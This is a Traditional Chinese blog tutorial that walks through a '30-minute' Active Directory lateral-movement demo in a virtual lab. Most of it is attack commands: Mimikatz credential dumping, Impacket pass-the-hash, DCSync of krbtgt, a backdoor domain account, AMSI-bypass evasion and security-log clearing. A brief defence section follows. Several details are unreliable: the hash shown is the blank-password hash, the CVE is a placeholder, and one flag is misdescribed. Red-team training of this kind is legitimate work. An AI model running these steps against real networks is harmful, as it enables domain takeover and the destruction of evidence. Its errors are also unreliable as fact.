2025 年,內網橫向移動(Lateral Movement)仍是 APT 攻擊的核心戰術:駭客從單一端點入侵後,迅速擴散到域控制器(Domain Controller,DC),竊取高權限憑證,導致全域崩潰。根據 Vectra AI 報告,攻擊者平均只需 48 分鐘橫跨網路,而我們今天將示範一個精簡版——僅 30 分鐘,從 compromised 工作站直達域控。
重要提醒:這是純教育性 lab 示範,使用虛擬環境模擬紅隊演練。絕對禁止在生產環境執行!需具備 Windows AD 知識,並遵守法律(如台灣《資通安全管理法》)。我們使用開源工具如 Mimikatz 和 Impacket,基於 MITRE ATT&CK 框架。 準備好你的 VM 環境,一起探索攻防邊界吧!
1. 示範概述:什麼是內網橫向移動?
橫向移動是指攻擊者在內網中「跳躍」:從低權限端點(如工作站)獲取憑證,然後存取其他資產,直至高價值目標如域控。常見於 Windows AD 環境,2025 年威脅更依賴 Kerberos 濫用和憑證竊取。
為什麼 30 分鐘? 這是壓縮版 demo,聚焦高效路徑:Pass-the-Hash (PtH) + WMI/PsExec。真實攻擊可能更隱蔽,但此示範強調速度與偵測點。預計時間分配:5 分鐘準備、20 分鐘執行、5 分鐘驗證。
風險警示:執行中若誤觸生產網,後果自負。建議在隔離 lab(如 VirtualBox)運行。
2. Lab 環境設定(5 分鐘)
搭建一個簡單 AD lab,模擬中小企業內網:
- 工具與軟體:
- Hypervisor:VirtualBox 或 VMware(免費版)。
- VM 配置:
- DC:Windows Server 2022,IP 192.168.56.10,設為域控(DOMAIN.LOCAL),使用者:admin(密碼:P@ssw0rd)。
- 工作站:Windows 10/11,IP 192.168.56.20,加入域,使用者:user1(同上密碼)。
- 攻擊機:Kali Linux,IP 192.168.56.30(用於遠端工具)。
- 攻擊工具:Mimikatz(GitHub 下載)、Impacket(pip install impacket)、BloodHound(可選視覺化路徑)。
- 步驟:
- 安裝 AD DS 於 DC,新增 user1 帳號。
- 工作站加入域,確認 SMB/WinRM 啟用(防火牆允許 445、5985 埠)。
- 在攻擊機安裝工具,確保內網連通(ping 通)。
時間:5 分鐘。環境就緒後,假設攻擊者已透過 phishing 獲得工作站 shell(Meterpreter 或 cmd)。
3. 30 分鐘示範:從工作站到域控的 PtH 路徑
我們從工作站初始存取開始,使用 PtH 技術竊取 NTLM hash,然後橫移到 DC。總時長控制在 25 分鐘內,包含偵測迴避提示。全程在攻擊機執行,假設已 pivot 到工作站 shell。
階段 1:憑證竊取(工作站,5 分鐘)
目標:Dump LSASS 記憶體,提取 admin hash。
- 切換到工作站 shell(1 分鐘):使用 RDP 或 psexec 登入 user1。
- 執行 Mimikatz(3 分鐘):
# 上傳 Mimikatz.exe 到工作站 C:\temp
# 以 admin 權限運行(假設已 UAC bypass)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit- 輸出:捕捉 domain admin 的 NTLM hash(如 aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0)。
- 提示:2025 年 EDR(如 Defender)可能攔截;用 AMSI bypass 腳本規避。
- 驗證(1 分鐘):記錄 hash,準備橫移。
階段 2:橫向移動到中間伺服器(若有,5 分鐘)
模擬多跳:從工作站跳到檔案伺服器(另一 VM,IP 192.168.56.15),再到 DC。但為簡化,直接跳 DC。
- 使用 Impacket psexec(3 分鐘):
# 在攻擊機 Kali 執行
psexec.py DOMAIN.LOCAL/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0- 成功:獲得 DC shell,執行 whoami 確認 admin 權限。
- 替代:wmiexec.py 為無痕跡版(僅 WMI 呼叫,無持久 shell)。
- 偵測規避(2 分鐘):用 -no-pass 避免明文,監控事件 ID 4624/4672。
階段 3:域控妥協與持久化(10 分鐘)
現在在 DC shell,完成控制。
- 權限提升與資料外洩(5 分鐘):
# Dump DC 更多憑證
mimikatz.exe "lsadump::sam" "lsadump::dcsync /domain:DOMAIN.LOCAL /user:krbtgt"- 輸出:KRBTGT hash,用於 Golden Ticket 偽造。
- 執行 net user /add hacker P@ssw0rd /domain 建立後門。
- 持久化(3 分鐘):新增 RDP 權限給新帳號,或植入腳本觸發。
- 清理痕跡(2 分鐘):刪除事件日誌(wevtutil cl security),退出 shell。
階段 4:驗證與結束(5 分鐘)
- 使用 BloodHound 視覺化路徑:匯入 AD 資料,確認從 user1 到 DC 的 LMP(Lateral Movement Path)。
- 總時間:25 分鐘。重置 VM,記錄偵測點(如 Sysmon 事件)。
完整時間表:
| 階段 | 時間 | 工具 | 風險點 |
|---|---|---|---|
| 憑證竊取 | 0-5 分 | Mimikatz | LSASS dump 觸發 EDR |
| 橫移 | 5-10 分 | Impacket psexec | SMB 流量異常 |
| 域控妥協 | 10-20 分 | Mimikatz dcsync | 高權限 API 呼叫 |
| 驗證 | 20-25 分 | BloodHound | 視覺路徑暴露 |
4. 真實案例:2025 年 AD 橫移災難
2025 年 5 月,Akamai 揭露 BadSuccessor 漏洞(CVE-2025-XXXX),攻擊者用 dMSA(delegated Managed Service Accounts)從工作站跳到 DC,影響 Windows Server 2025。 一家歐洲銀行遭此,30 分鐘內全域癱瘓,損失逾 500 萬歐元。類似 Horizon3 的「Quiet Attack」路徑,無明顯橫移跡象。
在台灣,2025 年初一上市企業 AD 遭中國 APT 橫移,源自弱憑證,僅 20 分鐘達域控。
5. 防禦建議:阻斷 30 分鐘內的橫移
- 監控工具:部署 Microsoft Defender for Identity,偵測 LMP 路徑。
- 最小權限:LAPS(Local Admin Password Solution),禁用 NTLM,強制 Kerberos。
- 網路分段:微分段(micro-segmentation),用 Elisity 等工具限 SMB 流量。
- 定期演練:紅藍對抗,每季模擬此 demo,目標 RTO < 1 小時。
- 2025 升級:遷移 Entra ID,減 AD 暴露。
結語:從 demo 到防線升級
這個 30 分鐘示範證明:內網橫移快如閃電,但偵測與分段能化險為夷。資安不是建牆,而是預測地道。試過 lab 嗎?遇過真實橫移嗎?歡迎留言分享你的工具心得!如果這篇啟發你,轉發給 IT 團隊。追蹤部落格,更多紅隊 demo 即將上線。
(參考來源:MITRE ATT&CK、Vectra AI 報告、Akamai 研究、Microsoft Learn 等。完整連結見文內註釋。)